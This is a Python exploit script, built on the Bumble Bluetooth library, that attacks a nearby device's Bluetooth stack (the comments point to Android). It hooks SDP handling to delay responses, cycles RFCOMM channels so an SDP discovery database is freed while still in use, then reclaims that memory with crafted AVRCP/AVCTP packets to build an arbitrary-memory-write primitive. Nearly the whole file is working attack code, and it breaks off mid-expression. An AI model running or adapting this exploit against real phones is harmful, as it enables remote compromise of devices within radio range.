import asyncio import struct import bumble.logging from bumble import core, hci, rfcomm, transport, utils, hfp, sdp, avrcp, l2cap from bumble.colors import color from bumble.device import Connection, Device, DeviceConfiguration from bumble.l2cap import ClassicChannelSpec hci_transport = "android-netsim" device_config = "device.json" address = "DA:4C:10:DE:17:00" # copied from Bumble's examples/run_hfp_gateway.py def _default_configuration() -> hfp.AgConfiguration: return hfp.AgConfiguration( supported_ag_features=[ hfp.AgFeature.HF_INDICATORS, hfp.AgFeature.IN_BAND_RING_TONE_CAPABILITY, hfp.AgFeature.REJECT_CALL, hfp.AgFeature.CODEC_NEGOTIATION, hfp.AgFeature.ESCO_S4_SETTINGS_SUPPORTED, hfp.AgFeature.ENHANCED_CALL_STATUS, ], supported_ag_indicators=[ hfp.AgIndicatorState.call(), hfp.AgIndicatorState.callsetup(), hfp.AgIndicatorState.callheld(), hfp.AgIndicatorState.service(), hfp.AgIndicatorState.signal(), hfp.AgIndicatorState.roam(), hfp.AgIndicatorState.battchg(), ], supported_hf_indicators=[ hfp.HfIndicator.ENHANCED_SAFETY, hfp.HfIndicator.BATTERY_LEVEL, ], supported_ag_call_hold_operations=[], supported_audio_codecs=[hfp.AudioCodec.CVSD, hfp.AudioCodec.MSBC], ) def AvctMakePacket(transaction_label, packet_type, is_command, ipid, pid, payload): return (struct.pack( ">BH", transaction_label << 4 | packet_type << 2 | (0 if is_command else 1) << 1 | (1 if ipid else 0), pid, ) + payload) async def main(): bumble.logging.setup_basic_logging("INFO") async with await transport.open_transport(hci_transport) as ( hci_source, hci_sink, ): device = Device.from_config_file_with_hci(device_config, hci_source, hci_sink) device.classic_enabled = True configuration = _default_configuration() ag_sdp_record_handle = 0x00010001 avrcp_controller_service_record_handle = 0x00010002 avrcp_target_service_record_handle = 0x00010003 device.sdp_service_records = { ag_sdp_record_handle: hfp.make_ag_sdp_records(1, ag_sdp_record_handle, configuration), avrcp_controller_service_record_handle: avrcp.make_controller_service_sdp_records( avrcp_controller_service_record_handle), avrcp_target_service_record_handle: avrcp.make_target_service_sdp_records( avrcp_controller_service_record_handle), } requests: list[sdp.SDP_ServiceSearchAttributeRequest] = [] sdp_connections: list[l2cap.ClassicChannel] = [] multiple_sdp_connections = True # True for Android <=12L await device.power_on() connection = await device.connect( address, transport=core.PhysicalTransport.BR_EDR) await connection.authenticate() await connection.encrypt() hfp_record = await hfp.find_hf_sdp_record(connection) if hfp_record is None: print("target device doesn't support Headset Client") return hfp_channel_id = hfp_record[0] avrcp_protocol = avrcp.Protocol() avrcp_protocol.listen(device) await avrcp_protocol.connect(connection) def avctp_on_message_hook( transaction_label: int, is_command: bool, ipid: bool, pid: int, payload: bytes, ): print(transaction_label, is_command, ipid, pid, payload) don_t_have_a2dp = True if don_t_have_a2dp: avrcp_protocol.avctp_protocol.orig_on_message = avrcp_protocol.avctp_protocol.on_message avrcp_protocol.avctp_protocol.on_message = avctp_on_message_hook # TODO(zhuowei): wait for EVENT_CONNECTION instead await asyncio.sleep(1) def my_hook(request_): print("got SDP, doing NOTHING", request_) requests.append(request_) if multiple_sdp_connections: sdp_connections.append(device.sdp_server.channel) device.sdp_server.orig_on_sdp_service_search_attribute_request = device.sdp_server.on_sdp_service_search_attribute_request device.sdp_server.on_sdp_service_search_attribute_request = my_hook rfcomm_client = rfcomm.Client(connection) rfcomm_mux = await rfcomm_client.start() async def do_write(target_address, target_buffer): requests.clear() sdp_connections.clear() channel = await rfcomm_mux.open_dlc(hfp_channel_id) print("open dlc!!!!!!!") await asyncio.sleep(0.5) await channel.disconnect() await asyncio.sleep(0.5) channel = await rfcomm_mux.open_dlc(hfp_channel_id) await asyncio.sleep(0.5) sdp_response = sdp.SDP_ErrorResponse( transaction_id=requests[0].transaction_id, error_code=sdp.SDP_INVALID_SERVICE_RECORD_HANDLE_ERROR, ) if multiple_sdp_connections: sdp_connections[0].send_pdu(sdp_response) else: device.sdp_server.send_response(sdp_response) await asyncio.sleep(0.5) # now p_disc_db is dangling: realloc it using avct_lcb_msg_asmbl # we don't control the first 0x13 bytes; with 0xef as my filler: # 0000 00 00 02 01 0b 01 01 00 19 00 07 01 03 01 75 00 ..............u. # 0010 06 06 41 ef ef ef ef ef ef ef ef ef ef ef ef ef ..A............. buf_offset = 0x13 tSDP_DISCOVERY_DB_raw_data_offset = 0x70 # raw_data, raw_size, raw_used avrcp_command_buf = b"A" * ( tSDP_DISCOVERY_DB_raw_data_offset - buf_offset) + struct.pack( "